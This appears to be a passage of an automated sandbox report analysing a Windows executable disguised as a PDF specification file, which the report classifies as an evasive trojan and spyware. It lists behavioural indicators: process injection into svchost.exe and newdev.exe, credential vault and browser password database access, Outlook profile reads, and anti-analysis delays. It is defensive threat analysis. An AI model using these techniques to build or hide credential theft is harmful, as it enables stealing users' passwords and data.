Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAE692 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87BE4 appears 98 times
Source: C:\Windows\SysWOW64\newdev.exe | Code function: String function: 04BC7BE4 appears 98 times
Source: C:\Windows\SysWOW64\newdev.exe | Code function: String function: 04BEE692 appears 86 times
Source: C:\Windows\SysWOW64\newdev.exe | Code function: String function: 04BFEF10 appears 105 times
Source: C:\Windows\SysWOW64\newdev.exe | Code function: String function: 04BB5050 appears 36 times
Source: C:\Windows\SysWOW64\newdev.exe | Code function: String function: 04B6B910 appears 272 times
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: String function: 00366AC0 appears 42 times
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: String function: 0036F8A0 appears 35 times
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: String function: 0035EC2F appears 68 times
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003FFD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003E53000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/1
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038CE7A GetLastError,FormatMessageW,0_2_0038CE7A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037AB84 AdjustTokenPrivileges,CloseHandle,0_2_0037AB84
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0037B134
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0038E1FD
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00386532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00386532
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0039C18C CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0039C18C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0034406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0034406B
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeFile created: C:\Users\user\AppData\Local\Temp\autBB75.tmpJump to behavior
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6806932663.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
              Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic file information: File size 1187840 > 1048576
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdb source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00366B05 push ecx; ret 0_2_00366B18
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00349C63 push edi; retn 0000h 0_2_00349C65
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00349DD8 push F7FFFFFFh; retn 0000h 0_2_00349DDD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D03B push es; iretd 1_2_0040D0A5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004070B1 push 64620B57h; iretd 1_2_004070E8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403170 push eax; ret 1_2_00403172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D2EE pushfd ; retf 1_2_0040D336
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041EC00 pushad ; retf 1_2_0041EC7F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D5CE push ss; ret 1_2_0040D5D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A6D3 push FFFFFFFEh; ret 1_2_0041A68F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A754 push edi; iretd 1_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A77F push edi; iretd 1_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004137D3 pushfd ; ret 1_2_004137F4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418FE9 push ds; ret 1_2_00418FF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A783 push edi; iretd 1_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C021AD pushad ; retf 0004h 1_2_03C0223F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C308CD push ecx; mov dword ptr [esp], ecx 1_2_03C308D6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01097 push esi; ret 1_2_03C010A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C097A1 push es; iretd 1_2_03C097A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1744C push ss; iretd 1_2_04D1746A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D2455E push ebp; ret 1_2_04D24563
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D14541 push edx; ret 1_2_04D14568
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D146C8 push ss; ret 1_2_04D146D7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D14690 pushad ; retf 1_2_04D146A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D1C7EE push FFFFFF97h; iretd 1_2_04D1C80D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D157AE push esp; retf 1_2_04D157B9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D25122 push eax; ret 1_2_04D25124
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D15F77 push es; iretd 1_2_04D15F78
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_04D15F26 push ss; retf 1_2_04D15F32
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032ABF26 push ss; retf 2_2_032ABF32
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 2_2_032ABF77 push es; iretd 2_2_032ABF78
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | File created: \heng hui 68 full specification details and pic pdf.exe
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | File created: \heng hui 68 full specification details and pic pdf.exe
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036123A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0036123A
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\newdev.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\newdev.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\newdev.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\newdev.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\newdev.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | API/Special instruction interceptor: Address: 20E3214
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A54D144
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A550594
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A54FF74
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A54D6C4
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A54D864
Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF88A54D004
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D144
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A550594
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D764
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D324
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D364
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D004
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54FF74
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D6C4
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D864
Source: C:\Windows\SysWOW64\newdev.exe | API/Special instruction interceptor: Address: 7FF88A54D604
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7088E rdtsc
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Evaded block: after key decision graph_0-93593
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Evaded block: after key decision graph_0-94688
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94117
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
Source: C:\Windows\SysWOW64\newdev.exe | API coverage: 1.3 %
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2796 | Thread sleep count: 86 > 30
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2796 | Thread sleep time: -430000s >= -30000s
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Last function: Thread delayed
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003860DD FindFirstFileW,DeleteFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003863F9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0038EB60 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0038F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00391F94 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: newdev.exe, 00000003.00000002.6803895083.0000000000B38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\"~
Source: RAVCpl64.exe, 00000002.00000002.11193961061.0000000000577000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
